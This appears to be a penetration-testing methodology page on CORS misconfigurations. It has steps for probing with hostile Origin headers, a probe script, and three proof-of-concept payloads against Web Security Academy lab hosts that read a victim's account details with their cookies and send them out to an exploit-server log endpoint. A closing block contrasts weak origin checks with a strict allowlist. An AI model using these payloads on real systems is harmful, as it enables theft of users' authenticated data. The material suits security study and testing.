Cross-origin resource sharing (CORS)

Methodology

  1. Look for any CORS-related headers in the responses, such as:

    • Access-Control-Allow-Credentials

    • Access-Control-Allow-Origin

    An accepted origin only lets you read authenticated data when Access-Control-Allow-Credentials: true is present; browsers refuse to expose a credentialed response when Access-Control-Allow-Origin is *.

  2. Inject a custom Origin header and observe whether it is reflected in Access-Control-Allow-Origin:

    • Origin: http://malicious-server.com

  3. Attempt to inject null as the Origin header (browsers send it for sandboxed iframes, file:// pages and some redirects):

    • Origin: null

  4. Attempt to inject an origin that is a subdomain of the trusted domain, to bypass checks that only look at the domain suffix:

    • Origin: http://malicious-website.trusted-subdomain.com

  5. Attempt to inject an attacker-controlled domain that starts with the trusted name, to bypass checks that only look at the prefix (or use an unanchored regex):

    • Origin: http://trusted-subdomain.malicious-website.com

  6. If step 5 works, the accepted origin is already under your control and can host the POC directly. If step 4 works, or a trusted subdomain is accepted over plain http, look for an XSS vulnerability on that subdomain so the POC runs from an origin the target trusts and achieves full exploitation.
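The steps above as a small Node.js probe-and-classify script, added here as an example and not code from the original page. It builds the Origin values from steps 2 to 5 (plus the plain-http variant used by the last POC) for an assumed target and attacker host, then classifies the Access-Control-* headers of each response; the hostnames and the sample responses are constructed to look like a target whose check is "hostname ends with our domain" and which also trusts the null origin.

```javascript
// Added example, not part of the original page. Hostnames and sample
// responses below are constructed for illustration.

// Steps 2-5 of the methodology as concrete Origin header values for one target.
function buildProbes(targetOrigin, attackerHost) {
  const { hostname } = new URL(targetOrigin);
  return {
    arbitrary: `https://${attackerHost}`,                   // step 2: blind reflection
    nullOrigin: "null",                                      // step 3: sandboxed iframe / file: / redirect
    subdomainOfTrusted: `https://evil.${hostname}`,          // step 4: suffix-only check
    trustedAsPrefix: `https://${hostname}.${attackerHost}`,  // step 5: prefix-only / unanchored regex
    insecureScheme: `http://${hostname}`,                    // plain-http variant of a trusted host
  };
}

// Classify one response. `headers` maps lower-cased header names to values.
function assessResponse(sentOrigin, headers) {
  const acao = headers["access-control-allow-origin"];
  const allowCreds = String(headers["access-control-allow-credentials"] || "").toLowerCase() === "true";
  const varies = /\borigin\b/i.test(headers["vary"] || "");
  if (acao === undefined) {
    return { verdict: "no-cors", exploitable: false };
  }
  if (acao === "*") {
    // Browsers never expose a credentialed response to ACAO: *, so only
    // unauthenticated data is readable cross-origin.
    return { verdict: "wildcard", exploitable: false };
  }
  if (acao !== sentOrigin) {
    return { verdict: "static-allowlist", exploitable: false };
  }
  // Our Origin came back verbatim: the server trusts it. Credentials decide
  // whether authenticated data can be read; a missing Vary: Origin additionally
  // lets a shared cache serve our ACAO value to other users.
  return {
    verdict: sentOrigin === "null" ? "null-trusted" : "origin-reflected",
    exploitable: allowCreds,
    cachePoisoning: !varies,
  };
}

// Run every probe against the recorded responses; findings are keyed by probe name.
function runProbes(probes, responses) {
  const findings = {};
  for (const [name, origin] of Object.entries(probes)) {
    findings[name] = assessResponse(origin, responses[name] || {});
  }
  return findings;
}

// Constructed target and responses (assumed, not a real host).
const PROBES = buildProbes("https://api.example-target.com", "attacker.example");
const SAMPLE_RESPONSES = {
  arbitrary: {},
  nullOrigin: { "access-control-allow-origin": "null", "access-control-allow-credentials": "true", vary: "Origin" },
  subdomainOfTrusted: { "access-control-allow-origin": "https://evil.api.example-target.com", "access-control-allow-credentials": "true" },
  trustedAsPrefix: {},
  insecureScheme: { "access-control-allow-origin": "http://api.example-target.com", "access-control-allow-credentials": "true", vary: "Origin" },
};
const FINDINGS = runProbes(PROBES, SAMPLE_RESPONSES);

for (const [name, f] of Object.entries(FINDINGS)) {
  console.log(`${name.padEnd(20)} ${PROBES[name].padEnd(48)} ${f.verdict}${f.exploitable ? " (exploitable)" : ""}`);
}
```

To use it against a live target, replace SAMPLE_RESPONSES with the headers captured from one request per probe (each sent with the corresponding Origin value from PROBES); the classifier itself does not need changing.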

POC - CORS vulnerability with basic origin reflection

Example of reflection (hosted on the attacker's exploit server; the server reflects the attacker's Origin and sends Access-Control-Allow-Credentials: true):

<script>
	// Fetch the victim's account details with their session cookie attached.
	var xhr = new XMLHttpRequest();
	var url = "https://0a5700af03252f57800853a300030003.web-security-academy.net";
	xhr.onreadystatechange = function(){
		if (xhr.readyState == XMLHttpRequest.DONE){
			// The response is readable cross-origin only because of the misconfiguration;
			// exfiltrate it to the exploit server's log endpoint.
			fetch("/log?key=" + encodeURIComponent(xhr.responseText));
		}
	};
	xhr.open("GET", url + "/accountDetails", true);
	xhr.withCredentials = true; // send the victim's cookies
	xhr.send(null);
</script>

POC - CORS vulnerability with trusted null origin

Example of trusted null origin (a sandboxed iframe without allow-same-origin runs with the opaque origin, so the browser sends Origin: null, which the target whitelists):

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
    // Credentialed request from the null origin; the server answers with
    // Access-Control-Allow-Origin: null and Access-Control-Allow-Credentials: true.
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://0a710082034c5cc4821c98cb00790013.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();
    function reqListener() {
        // allow-top-navigation lets the sandboxed frame redirect the top window to the exploit server.
        location='https://exploit-0a4100cc034e5ccc824a97f401f40059.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
    };
</script>"></iframe>

POC - CORS vulnerability with trusted insecure protocols

Example of trusted insecure protocols (the target accepts its own subdomains over plain http, and the stock subdomain has a reflected XSS in productId, so the victim is sent there with the CORS payload in the URL; %2b and %3c are the URL-encoded + and < so the payload survives in the query string):

<script>
    // Redirect the victim to the http:// subdomain; the injected script then runs
    // from an origin the https API trusts and can read the credentialed response.
    document.location="http://stock.0aaa009c03ea093180d8355900d30095.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0aaa009c03ea093180d8355900d30095.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0aab0047030f09d6809b34e7011000f9.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
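The server-side checks that each of the three POCs and methodology steps 3 to 5 take advantage of, next to an exact-match allowlist that resists all of them. This is an added illustration, not code from the original page or from the lab applications; trusted-subdomain.com is the trusted host assumed by the methodology and every other hostname is constructed.

```javascript
// Added example, not part of the original page. Hostnames are constructed.
const TRUSTED_HOST = "trusted-subdomain.com"; // assumed trusted host from the methodology

// Weak check 1: string suffix. Accepts any subdomain and any scheme (steps 4 and
// the insecure-protocol POC), and even "nottrusted-subdomain.com" since there is no dot boundary.
function suffixCheck(origin) {
  return origin.endsWith(TRUSTED_HOST);
}

// Weak check 2: unanchored prefix regex. Accepts trusted-subdomain.<anything> (step 5).
function prefixCheck(origin) {
  return /^https?:\/\/trusted-subdomain\./.test(origin);
}

// Weak check 3: exact match, but "null" is whitelisted "for local testing" (step 3 / null POC).
function nullTolerantCheck(origin) {
  return origin === "null" || origin === `https://${TRUSTED_HOST}`;
}

// Hardened: exact match against a closed allowlist of full origins (scheme, host, port),
// so no scheme downgrade, no subdomains, no prefix confusion and no null.
const ALLOWLIST = new Set([`https://${TRUSTED_HOST}`]);
function allowlistCheck(origin) {
  return ALLOWLIST.has(origin);
}

// What the server emits for a given Origin under a given check: nothing on rejection,
// the echoed origin plus Vary: Origin on acceptance so shared caches key on the Origin.
function corsHeaders(origin, check) {
  if (!check(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Which checks accept which probe origins.
function matrix(origins) {
  const checks = { suffixCheck, prefixCheck, nullTolerantCheck, allowlistCheck };
  const out = {};
  for (const origin of origins) {
    out[origin] = Object.fromEntries(Object.entries(checks).map(([name, fn]) => [name, fn(origin)]));
  }
  return out;
}

const PROBE_ORIGINS = [
  `https://${TRUSTED_HOST}`,                         // the legitimate origin
  `http://${TRUSTED_HOST}`,                          // insecure-protocol POC
  `https://malicious-website.${TRUSTED_HOST}`,       // step 4
  `https://trusted-subdomain.malicious-website.com`, // step 5
  `https://not${TRUSTED_HOST}`,                      // missing dot boundary
  "null",                                            // step 3
];
const MATRIX = matrix(PROBE_ORIGINS);
console.table(MATRIX);
```

Only the allowlistCheck column is true for exactly one row, the legitimate https origin; each weak check lets at least one attacker-reachable origin through, and corsHeaders then echoes it with credentials enabled, which is the condition the three POCs rely on.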
